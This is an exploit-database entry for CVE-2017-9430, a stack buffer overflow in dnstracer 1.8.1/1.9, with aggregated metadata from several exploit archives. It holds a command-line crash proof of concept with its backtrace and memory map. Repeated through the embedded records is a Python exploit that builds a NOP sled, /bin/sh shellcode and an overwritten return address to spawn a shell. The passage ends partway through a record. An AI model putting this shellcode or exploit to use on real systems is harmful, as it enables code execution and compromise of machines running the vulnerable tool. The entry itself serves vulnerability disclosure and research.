ID PACKETSTORM:142799
Type packetstorm
Reporter Hosein Askari
Modified 2017-06-05T00:00:00
Description
`################
#Exploit Title: DNSTracer Stack-based Buffer Overflow
#CVE: CVE-2017-9430
#CWE: CWE-119
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: http://www.mavetju.org
#Version : 1.8.1
#Tested on: Parrot OS
#Date: 04-06-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =
attackers to cause a denial of service (application crash) or possibly hav=
e unspecified other impact via a command line with a long name argument tha=
t is mishandled in a strcpy call for argv[0]. An example threat model is a =
web application that launches dnstracer with an untrusted name string.
###############################
#dnstracer -v $(python -c 'print "A"*1025')
*** buffer overflow detected ***: dnstracer terminated
=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
dnstracer(+0x2c8f)[0x5634368aac8f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
dnstracer(+0x2fca)[0x5634368aafca]
=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D
5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=
sr/bin/dnstracer
563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=
sr/bin/dnstracer
563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=
sr/bin/dnstracer
563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20
563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=
eap]
7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=
ib/x86_64-linux-gnu/libgcc_s.so.1
7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=
ib/x86_64-linux-gnu/libc-2.24.so
7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20
7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20
7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20
7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=
ib/x86_64-linux-gnu/ld-2.24.so
7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20
7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=
tack]
7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=
var]
7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=
dso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=
syscall]
Aborted
`
{"id": "PACKETSTORM:142799", "type": "packetstorm", "bulletinFamily": "exploit", "title": "DNSTracer 1.8.1 Buffer Overflow", "description": "", "published": "2017-06-05T00:00:00", "modified": "2017-06-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/142799/DNSTracer-1.8.1-Buffer-Overflow.html", "reporter": "Hosein Askari", "references": [], "cvelist": ["CVE-2017-9430"], "lastseen": "2017-06-05T19:20:29", "viewCount": 26, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-06-05T19:20:29", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-9430"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:47B2DD2CACC42EB4C2EEDECE2428913E", "EXPLOITPACK:0D9632A56C8FC554A3AD4359D579DF04"]}, {"type": "exploitdb", "idList": ["EDB-ID:42115", "EDB-ID:42424"]}, {"type": "zdt", "idList": ["1337DAY-ID-27897", "1337DAY-ID-28223"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143654"]}], "modified": "2017-06-05T19:20:29", "rev": 2}, "vulnersScore": 7.7}, "sourceHref": "https://packetstormsecurity.com/files/download/142799/dnstracer181-overflow.txt", "sourceData": "`################ \n#Exploit Title: DNSTracer Stack-based Buffer Overflow \n#CVE: CVE-2017-9430 \n#CWE: CWE-119 \n#Exploit Author: Hosein Askari (FarazPajohan) \n#Vendor HomePage: http://www.mavetju.org \n#Version : 1.8.1 \n#Tested on: Parrot OS \n#Date: 04-06-2017 \n#Category: Application \n#Author Mail : hosein.askari@aol.com \n#Description: Stack-based buffer overflow in dnstracer through 1.9 allows = \nattackers to cause a denial of service (application crash) or possibly hav= \ne unspecified other impact via a command line with a long name argument tha= \nt is mishandled in a strcpy call for argv[0]. An example threat model is a = \nweb application that launches dnstracer with an untrusted name string. \n############################### \n \n#dnstracer -v $(python -c 'print \"A\"*1025') \n*** buffer overflow detected ***: dnstracer terminated \n=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D \n/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb] \n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037] \n/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170] \n/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2] \ndnstracer(+0x2c8f)[0x5634368aac8f] \n/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1] \ndnstracer(+0x2fca)[0x5634368aafca] \n=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D \n5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u= \nsr/bin/dnstracer \n563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u= \nsr/bin/dnstracer \n563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u= \nsr/bin/dnstracer \n563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20 \n563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h= \neap] \n7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l= \nib/x86_64-linux-gnu/libgcc_s.so.1 \n7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l= \nib/x86_64-linux-gnu/libc-2.24.so \n7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20 \n7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l= \nib/x86_64-linux-gnu/ld-2.24.so \n7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20 \n7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20 \n7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l= \nib/x86_64-linux-gnu/ld-2.24.so \n7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l= \nib/x86_64-linux-gnu/ld-2.24.so \n7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20 \n7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s= \ntack] \n7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v= \nvar] \n7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v= \ndso] \nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v= \nsyscall] \nAborted \n \n \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:36:52", "description": "Stack-based buffer overflow in dnstracer through 1.9 allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a command line with a long name argument that is mishandled in a strcpy call for argv[0]. An example threat model is a web application that launches dnstracer with an untrusted name string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-05T11:29:00", "title": "CVE-2017-9430", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9430"], "modified": "2017-08-12T01:29:00", "cpe": ["cpe:/a:dnstracer_project:dnstracer:1.9"], "id": "CVE-2017-9430", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9430", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:dnstracer_project:dnstracer:1.9:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-04T19:02:21", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2017-08-03T00:00:00", "title": "DNSTracer 1.9 - Buffer Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9430"], "modified": "2017-08-03T00:00:00", "href": "https://0day.today/exploit/description/28223", "id": "1337DAY-ID-28223", "sourceData": "# Exploit Title: DNSTracer 1.9 - Buffer Overflow\r\n# Google Dork: [if applicable]\r\n# Exploit Author: j0lama\r\n# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php\r\n# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz\r\n# Version: 1.9\r\n# Tested on: Ubuntu 12.04\r\n# CVE : CVE-2017-9430\r\n# Bug report: https://www.exploit-db.com/exploits/42115/\r\n# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php\r\n \r\n \r\n# Proof of Concept\r\nimport os\r\nfrom subprocess import call\r\n \r\ndef run():\r\n try:\r\n print \"\\nDNSTracer Stack-based Buffer Overflow\"\r\n print \"Author: j0lama\"\r\n print \"Tested with Dnstracer compile without buffer overflow protection\"\r\n \r\n nops = \"\\x90\"*1006\r\n shellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n filling = \"A\"*24\r\n eip = \"\\x2f\\xeb\\xff\\xbf\"\r\n \r\n #buf size = 1057\r\n buf = nops + shellcode + filling + eip\r\n \r\n call([\"./dnstracer\", buf])\r\n \r\n except OSError as e:\r\n if e.errno == os.errno.ENOENT:\r\n print \"\\nDnstracer not found!\\n\"\r\n else:\r\n print \"\\nError executing exploit\\n\"\r\n raise\r\n \r\n \r\nif __name__ == '__main__':\r\n try:\r\n run()\r\n except Exception as e:\r\n print \"Something went wrong\"\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28223"}, {"lastseen": "2018-02-17T21:25:36", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2017-06-05T00:00:00", "title": "DNSTracer 1.8.1 - Buffer Overflow Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9430"], "modified": "2017-06-05T00:00:00", "href": "https://0day.today/exploit/description/27897", "id": "1337DAY-ID-27897", "sourceData": "################\r\n#Exploit Title: DNSTracer Stack-based Buffer Overflow\r\n#CVE: CVE-2017-9430\r\n#CWE: CWE-119\r\n#Exploit Author: Hosein Askari (FarazPajohan)\r\n#Vendor HomePage: http://www.mavetju.org\r\n#Version : 1.8.1\r\n#Tested on: Parrot OS\r\n#Date: 04-06-2017\r\n#Category: Application\r\n#Author Mail : [email\u00a0protected]\r\n#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =\r\nattackers to cause a denial of service (application crash) or possibly hav=\r\ne unspecified other impact via a command line with a long name argument tha=\r\nt is mishandled in a strcpy call for argv[0]. An example threat model is a =\r\nweb application that launches dnstracer with an untrusted name string.\r\n###############################\r\n \r\n#dnstracer -v $(python -c 'print \"A\"*1025')\r\n*** buffer overflow detected ***: dnstracer terminated\r\n=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]\r\n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]\r\ndnstracer(+0x2c8f)[0x5634368aac8f]\r\n/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]\r\ndnstracer(+0x2fca)[0x5634368aafca]\r\n=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D\r\n5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20\r\n563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=\r\neap]\r\n7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20\r\n7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20\r\n7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=\r\ntack]\r\n7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=\r\nvar]\r\n7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=\r\ndso]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=\r\nsyscall]\r\nAborted\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27897"}], "exploitdb": [{"lastseen": "2017-08-03T17:42:37", "description": "DNSTracer 1.9 - Buffer Overflow. CVE-2017-9430. Local exploit for Linux platform", "published": "2017-08-03T00:00:00", "type": "exploitdb", "title": "DNSTracer 1.9 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9430"], "modified": "2017-08-03T00:00:00", "id": "EDB-ID:42424", "href": "https://www.exploit-db.com/exploits/42424/", "sourceData": "# Exploit Title: DNSTracer 1.9 - Buffer Overflow\r\n# Google Dork: [if applicable]\r\n# Date: 03-08-2017\r\n# Exploit Author: j0lama\r\n# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php\r\n# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz\r\n# Version: 1.9\r\n# Tested on: Ubuntu 12.04\r\n# CVE : CVE-2017-9430\r\n# Bug report: https://www.exploit-db.com/exploits/42115/\r\n# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php\r\n\r\n\r\n# Proof of Concept\r\nimport os\r\nfrom subprocess import call\r\n\r\ndef run():\r\n try:\r\n print \"\\nDNSTracer Stack-based Buffer Overflow\"\r\n print \"Author: j0lama\"\r\n print \"Tested with Dnstracer compile without buffer overflow protection\"\r\n\r\n nops = \"\\x90\"*1006\r\n shellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n filling = \"A\"*24\r\n eip = \"\\x2f\\xeb\\xff\\xbf\"\r\n\r\n #buf size = 1057\r\n buf = nops + shellcode + filling + eip\r\n\r\n call([\"./dnstracer\", buf])\r\n\r\n except OSError as e:\r\n if e.errno == os.errno.ENOENT:\r\n print \"\\nDnstracer not found!\\n\"\r\n else:\r\n print \"\\nError executing exploit\\n\"\r\n raise\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n run()\r\n except Exception as e:\r\n print \"Something went wrong\"", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42424/"}, {"lastseen": "2017-06-05T09:13:48", "description": "DNSTracer 1.8.1 - Buffer Overflow. CVE-2017-9430. Dos exploit for Linux platform", "published": "2017-06-05T00:00:00", "type": "exploitdb", "title": "DNSTracer 1.8.1 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9430"], "modified": "2017-06-05T00:00:00", "id": "EDB-ID:42115", "href": "https://www.exploit-db.com/exploits/42115/", "sourceData": "################\r\n#Exploit Title: DNSTracer Stack-based Buffer Overflow\r\n#CVE: CVE-2017-9430\r\n#CWE: CWE-119\r\n#Exploit Author: Hosein Askari (FarazPajohan)\r\n#Vendor HomePage: http://www.mavetju.org\r\n#Version : 1.8.1\r\n#Tested on: Parrot OS\r\n#Date: 04-06-2017\r\n#Category: Application\r\n#Author Mail : hosein.askari@aol.com\r\n#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =\r\nattackers to cause a denial of service (application crash) or possibly hav=\r\ne unspecified other impact via a command line with a long name argument tha=\r\nt is mishandled in a strcpy call for argv[0]. An example threat model is a =\r\nweb application that launches dnstracer with an untrusted name string.\r\n###############################\r\n\r\n#dnstracer -v $(python -c 'print \"A\"*1025')\r\n*** buffer overflow detected ***: dnstracer terminated\r\n=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D\r\n/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]\r\n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]\r\n/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]\r\ndnstracer(+0x2c8f)[0x5634368aac8f]\r\n/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]\r\ndnstracer(+0x2fca)[0x5634368aafca]\r\n=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D\r\n5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=\r\nsr/bin/dnstracer\r\n563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20\r\n563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=\r\neap]\r\n7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=\r\nib/x86_64-linux-gnu/libgcc_s.so.1\r\n7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=\r\nib/x86_64-linux-gnu/libc-2.24.so\r\n7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20\r\n7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20\r\n7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=\r\nib/x86_64-linux-gnu/ld-2.24.so\r\n7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20\r\n7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=\r\ntack]\r\n7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=\r\nvar]\r\n7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=\r\ndso]\r\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=\r\nsyscall]\r\nAborted\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42115/"}], "packetstorm": [{"lastseen": "2017-08-04T22:43:47", "description": "", "published": "2017-08-04T00:00:00", "type": "packetstorm", "title": "DNSTracer 1.9 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9430"], "modified": "2017-08-04T00:00:00", "id": "PACKETSTORM:143654", "href": "https://packetstormsecurity.com/files/143654/DNSTracer-1.9-Buffer-Overflow.html", "sourceData": "`# Exploit Title: DNSTracer 1.9 - Buffer Overflow \n# Google Dork: [if applicable] \n# Date: 03-08-2017 \n# Exploit Author: j0lama \n# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php \n# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz \n# Version: 1.9 \n# Tested on: Ubuntu 12.04 \n# CVE : CVE-2017-9430 \n# Bug report: https://www.exploit-db.com/exploits/42115/ \n# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php \n \n \n# Proof of Concept \nimport os \nfrom subprocess import call \n \ndef run(): \ntry: \nprint \"\\nDNSTracer Stack-based Buffer Overflow\" \nprint \"Author: j0lama\" \nprint \"Tested with Dnstracer compile without buffer overflow protection\" \n \nnops = \"\\x90\"*1006 \nshellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\" \nfilling = \"A\"*24 \neip = \"\\x2f\\xeb\\xff\\xbf\" \n \n#buf size = 1057 \nbuf = nops + shellcode + filling + eip \n \ncall([\"./dnstracer\", buf]) \n \nexcept OSError as e: \nif e.errno == os.errno.ENOENT: \nprint \"\\nDnstracer not found!\\n\" \nelse: \nprint \"\\nError executing exploit\\n\" \nraise \n \n \nif __name__ == '__main__': \ntry: \nrun() \nexcept Exception as e: \nprint \"Something went wrong\" \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143654/dnstracer19-overflow.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:11", "description": "\nDNSTracer 1.8.1 - Buffer Overflow (PoC)", "edition": 1, "published": "2017-06-05T00:00:00", "title": "DNSTracer 1.8.1 - Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9430"], "modified": "2017-06-05T00:00:00", "id": "EXPLOITPACK:47B2DD2CACC42EB4C2EEDECE2428913E", "href": "", "sourceData": "################\n#Exploit Title: DNSTracer Stack-based Buffer Overflow\n#CVE: CVE-2017-9430\n#CWE: CWE-119\n#Exploit Author: Hosein Askari (FarazPajohan)\n#Vendor HomePage: http://www.mavetju.org\n#Version : 1.8.1\n#Tested on: Parrot OS\n#Date: 04-06-2017\n#Category: Application\n#Author Mail : hosein.askari@aol.com\n#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =\nattackers to cause a denial of service (application crash) or possibly hav=\ne unspecified other impact via a command line with a long name argument tha=\nt is mishandled in a strcpy call for argv[0]. An example threat model is a =\nweb application that launches dnstracer with an untrusted name string.\n###############################\n\n#dnstracer -v $(python -c 'print \"A\"*1025')\n*** buffer overflow detected ***: dnstracer terminated\n=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D\n/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]\n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]\n/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]\n/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]\ndnstracer(+0x2c8f)[0x5634368aac8f]\n/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]\ndnstracer(+0x2fca)[0x5634368aafca]\n=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D\n5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=\nsr/bin/dnstracer\n563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=\nsr/bin/dnstracer\n563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 